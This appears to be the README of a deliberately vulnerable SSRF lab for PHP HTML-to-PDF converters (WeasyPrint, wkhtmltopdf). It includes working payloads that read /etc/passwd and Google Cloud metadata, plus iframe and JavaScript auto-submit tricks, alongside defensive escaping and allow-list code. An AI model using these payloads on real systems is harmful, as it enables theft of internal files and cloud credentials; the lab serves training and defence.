pdf_generator

1.0 SSRF in HTML to PDF converter functionality

Exploitation Difficulty: Easy

This scenario covers SSRF that arises when a web application accepts user input, places it into HTML and passes that HTML to an "HTML to PDF generator".

When the generator processes the HTML, it renders it the same way a web browser would, which includes fetching every resource the HTML references. If the attacker-supplied data is not sanitized or escaped before it is placed into the HTML, the attacker can make the "HTML to PDF generator" request internal hosts and domains on the server's behalf.
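An added example, not part of this repository's code, showing the two fixes a practitioner would apply to the pattern just described: escape the user-supplied value before it is placed into the HTML, and restrict which URLs the converter's fetcher may follow. The invoice template, the allow-listed host static.example.com and the function names are assumptions for this example; guarded_url_fetcher targets WeasyPrint's documented url_fetcher parameter and imports WeasyPrint lazily, so the policy functions run without it installed.

```python
import html
import ipaddress
from urllib.parse import urlsplit

# Constructed stand-in for the vulnerable PHP scripts: the customer name field
# is dropped straight into the HTML that the PDF converter will render.
INVOICE_TEMPLATE = (
    "<html><body><h1>Invoice</h1>"
    "<table><tr><th>Customer name</th><td>{name}</td></tr></table>"
    "</body></html>"
)


def build_invoice_html_vulnerable(name: str) -> str:
    """Untrusted input concatenated as markup: <link>, <img>, <iframe> all survive."""
    return INVOICE_TEMPLATE.format(name=name)


def build_invoice_html_fixed(name: str) -> str:
    """Same template, but the input is escaped so the converter sees text, not tags."""
    return INVOICE_TEMPLATE.format(name=html.escape(name, quote=True))


# Second layer: the converter still fetches whatever the document references, so
# restrict what its fetcher may reach. An allow-list of hosts (assumed here) beats a
# deny-list of 127.0.0.0/8, 169.254.0.0/16 and metadata.google.internal, because
# any DNS name an attacker controls can resolve to an internal address.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"static.example.com"}  # assumed location of legitimate CSS/images


def url_is_allowed(url: str) -> bool:
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False  # file://, data:, ftp:// and friends are refused outright
    host = (parts.hostname or "").lower()
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return False  # literal IPs (127.0.0.1, [::1], 169.254.169.254) never pass
    except ValueError:
        pass
    return host in ALLOWED_HOSTS


def guarded_url_fetcher(url: str, *args, **kwargs):
    """Drop-in for WeasyPrint's url_fetcher= parameter (assumes WeasyPrint is
    installed; the import is lazy so the policy above runs without it).
    Usage: HTML(string=doc, url_fetcher=guarded_url_fetcher).write_pdf("out.pdf")"""
    if not url_is_allowed(url):
        raise ValueError(f"fetch blocked by SSRF policy: {url}")
    from weasyprint import default_url_fetcher
    return default_url_fetcher(url, *args, **kwargs)
```

Even an allow-listed name can be rebound to an internal IP between check and fetch, so a production deployment should also resolve the host and check the address at fetch time, or run the converter in a network namespace with no route to internal ranges.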

This directory contains scenarios for two "HTML to PDF generator" back ends, each of which lets an attacker exploit SSRF if the web application places untrusted user-supplied data into the HTML.
These "HTML to PDF generators" are:

1. WeasyPrint
2. wkhtmltopdf


pdf_ssrf_weasyprint.php is the vulnerable script that uses WeasyPrint.
pdf_ssrf_wkhtmltopdf.php is the vulnerable script that uses wkhtmltopdf.

1.1 System Requirements:

1. The WeasyPrint and wkhtmltopdf converters must be installed on the machine.
2. A web server with PHP support

1.2.1 Linux based setup: wkhtmltopdf
No change is required; this script is developed to work on Linux.

1.2.2 Windows based setup:
The following changes are required in pdf_ssrf_wkhtmltopdf.php:

Remove the comment syntax from lines 271 and 272 so they look like this:

$path_pdf_converter='C:\Program Files\wkhtmltopdf\bin\wkhtmltopdf.exe'; /*remove the comment if you want to use it on Windows machine*/
passthru('"'.$path_pdf_converter.'" -T 0 -R 0 -B 0 -L 0 --orientation Portrait --page-size A4 sample.html output4.pdf'); /*remove the comment if you want to use it on Windows machine*/

Comment out line 273 like this:

//passthru('xvfb-run wkhtmltopdf -T 0 -R 0 -B 0 -L 0 --orientation Portrait --page-size A4 --quiet sample.html output4.pdf 2>&1');

1.3 Installation

wkhtmltopdf

sudo apt-get update
sudo apt-get install xvfb libfontconfig wkhtmltopdf

weasyprint

Follow the steps for your OS at the URL below to install WeasyPrint:

https://weasyprint.readthedocs.io/en/stable/install.html

2.0 Exploitation

Let's start with the exploitation and the possible attack vectors for SSRF.

2.1 SSRF in Weasyprint HTML to PDF generator

The web application accepts user input via the GUI.

It places the accepted input inside the HTML code and generates the PDF by rendering that HTML.

After observing such behaviour, try the following payloads to confirm whether the application code is vulnerable:

<h1>test</h1>
<img src=http://attacker_server_IP/>

If the application processes the above payloads (the heading renders in the PDF and your server receives the request for the image), move on to the payloads below to exploit the SSRF.

Payloads

To grab data from an HTTP URL, use a payload in the following style. WeasyPrint honours <link rel=attachment> and embeds the referenced resource in the PDF as a file attachment, so the response travels inside the PDF even though nothing is rendered on the page:

<link rel=attachment href="http://web_URL">
<link rel=attachment href="http://localhost/admin.php">

To grab data from the internal file system, use a payload in this style:

<link rel=attachment href="file://internal_file_path">
<link rel=attachment href="file:///etc/passwd">

2.1.1 Exploiting the SSRF - Google Cloud Metadata endpoint access

Let's assume the web application is hosted inside Google Cloud Platform and try to grab data from the internal Metadata endpoint. I saved a sample username and password as instance attributes during creation of the virtual machine; they are accessible at the URL below: http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes

The v1beta1 path matters: the v1 endpoint refuses requests that lack a Metadata-Flavor: Google header, which an HTML-driven fetch cannot add, whereas the legacy v1beta1 endpoint does not require it. On instances where legacy endpoints are disabled (disable-legacy-endpoints=TRUE) this request is refused.

The payload below grabs the HTTP response from the above Metadata URL and attaches it to the PDF:

<link rel=attachment href="http://metadata.google.internal/computeMetadata/v1beta1/instance/?recursive=true">

Open the generated PDF and observe that nothing appears in the customer name column: the response is stored as an attachment, not rendered. Download the generated PDF file to extract the data from it.

Extract the attached content from the downloaded PDF file using the Python script developed by Ben (Nahamsec):

python script.py  downloaded_file.pdf

The Python script extracts the attached HTTP response from the internal Metadata URL.

This is how an attacker can extract HTTP responses from other internal IPs/hosts.
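The extraction step above relies on Nahamsec's script, which is not reproduced here. As an added example (neither this repository's nor Nahamsec's code) that does the same job, the following scans a PDF for /EmbeddedFile objects, inflates FlateDecode streams and returns their bytes; build_sample_pdf constructs a minimal stand-in PDF so the example runs offline, it is not real WeasyPrint output. PDFs that pack objects into object streams or use an indirect /Length need a real PDF library instead.

```python
import re
import zlib
from typing import List, Optional


def build_sample_pdf(payload: bytes, compress: bool = True) -> bytes:
    """Constructed test data: a minimal PDF carrying one embedded file, shaped like
    the attachment a <link rel=attachment> produces. Not generated by WeasyPrint."""
    data = zlib.compress(payload) if compress else payload
    filt = b"/Filter /FlateDecode " if compress else b""
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /Type /Filespec /F (response.html) /EF << /F 4 0 R >> >>",
        b"<< /Type /EmbeddedFile " + filt + b"/Length " + str(len(data)).encode()
        + b" >>\nstream\n" + data + b"\nendstream",
    ]
    out = b"%PDF-1.7\n"
    for num, body in enumerate(objects, start=1):
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


# "N G obj ... endobj" pairs; DOTALL because stream data spans lines.
_OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.DOTALL)


def _stream_bytes(body: bytes) -> Optional[bytes]:
    """Raw stream payload of one object body. A direct /Length is trusted so that
    binary data containing CR/LF or the word 'endstream' is sliced exactly."""
    sm = re.search(rb"stream\r?\n", body)
    if sm is None:
        return None
    start = sm.end()
    lm = re.search(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)", body[:sm.start()])
    if lm:
        return body[start:start + int(lm.group(1))]
    end = body.rfind(b"endstream")  # fallback when /Length is an indirect reference
    return None if end == -1 else body[start:end].rstrip(b"\r\n")


def extract_embedded_files(pdf: bytes) -> List[bytes]:
    """Return the decoded bytes of every /EmbeddedFile stream in the PDF."""
    found: List[bytes] = []
    for match in _OBJ_RE.finditer(pdf):
        body = match.group(2)
        if not re.search(rb"/Type\s*/EmbeddedFile", body):
            continue
        data = _stream_bytes(body)
        if data is None:
            continue
        if re.search(rb"/Filter\s*/FlateDecode", body):
            data = zlib.decompress(data)
        found.append(data)
    return found


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            pdf_bytes = fh.read()
    else:  # no file given: run against the constructed sample
        pdf_bytes = build_sample_pdf(b"root:x:0:0:root:/root:/bin/bash\n")
    for index, blob in enumerate(extract_embedded_files(pdf_bytes)):
        print(f"--- attachment {index} ({len(blob)} bytes) ---")
        print(blob.decode("utf-8", "replace"))
```

Run it as python extract_attachments.py downloaded_file.pdf (the file name is an assumption); with no argument it demonstrates itself on the constructed sample. If it finds nothing in a real PDF, the attachment is most likely inside an object stream, which this regex-level scan deliberately does not parse.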

2.2 SSRF in wkhtmltopdf, HTML to PDF generator

An attacker can exploit SSRF in a web application that uses wkhtmltopdf to generate a PDF from HTML containing untrusted user-supplied data.

The web application accepts user-supplied data.

The generated PDF contains the user-supplied data.

Payload to load an internal app's rendered HTTP response inside the PDF using the <iframe> HTML tag:

<iframe src="http://internal_app" height=800px width=800px></iframe>

Payload for a page that sends an "X-Frame-Options" header in its HTTP response and therefore can not be loaded inside an <iframe>. Instead of framing it, JavaScript auto-submits a form so the top-level document itself navigates to the internal app and that page is what gets rendered into the PDF. The submit.call trick works even when the form has a field named "submit"; it needs JavaScript, which wkhtmltopdf enables by default:

<body onload="document.createElement('form').submit.call(document.getElementById('myForm'))"><form id="myForm" name="myForm" action="http://internal_app" method=GET></form></body> 

Specify the above payload and submit the form.

Open the generated PDF and there we go....
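An added example, not this repository's code, that rebuilds the wkhtmltopdf invocation from the script's passthru() call as an argument list and places the hardened form a defender would use beside it. The flag names are wkhtmltopdf's own; the function names and the assumption that wkhtmltopdf is on PATH are this example's.

```python
import shutil
import subprocess
from typing import List

# Margins, orientation and page size exactly as in the script's passthru() call.
BASE_FLAGS = ["-T", "0", "-R", "0", "-B", "0", "-L", "0",
              "--orientation", "Portrait", "--page-size", "A4", "--quiet"]

# Hardening flags this example adds (wkhtmltopdf's own switches).
HARDENING_FLAGS = [
    "--disable-local-file-access",  # refuses file:// and local paths (the 0.12.6 default, stated explicitly)
    "--disable-javascript",         # defeats the form auto-submit payload; the <iframe> payload needs no JS
]


def wkhtmltopdf_argv(html_path: str, pdf_path: str, hardened: bool = True,
                     binary: str = "wkhtmltopdf") -> List[str]:
    """Build the argument vector. Passing a list (rather than the shell string
    passthru() builds) means the paths are never re-parsed by /bin/sh."""
    argv = [binary, *BASE_FLAGS]
    if hardened:
        argv.extend(HARDENING_FLAGS)
    argv.extend([html_path, pdf_path])
    return argv


def render_pdf(html_path: str, pdf_path: str, hardened: bool = True,
               timeout: int = 60) -> None:
    """Run the converter; on a headless Linux box prepend xvfb-run as the script does.
    Assumption: the wkhtmltopdf binary is on PATH."""
    if shutil.which("wkhtmltopdf") is None:
        raise RuntimeError("wkhtmltopdf not found on PATH")
    subprocess.run(wkhtmltopdf_argv(html_path, pdf_path, hardened),
                   check=True, timeout=timeout)


if __name__ == "__main__":
    print(" ".join(wkhtmltopdf_argv("sample.html", "output4.pdf", hardened=False)))
    print(" ".join(wkhtmltopdf_argv("sample.html", "output4.pdf", hardened=True)))
```

These two flags only govern local file access and JavaScript: the <iframe src="http://internal_app"> payload still reaches the internal app, so HTTP-level SSRF has to be stopped with egress filtering or by running the converter in a network-isolated sandbox. Escaping the user-supplied value before it enters the HTML, as for WeasyPrint, remains the primary fix.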

./Thanks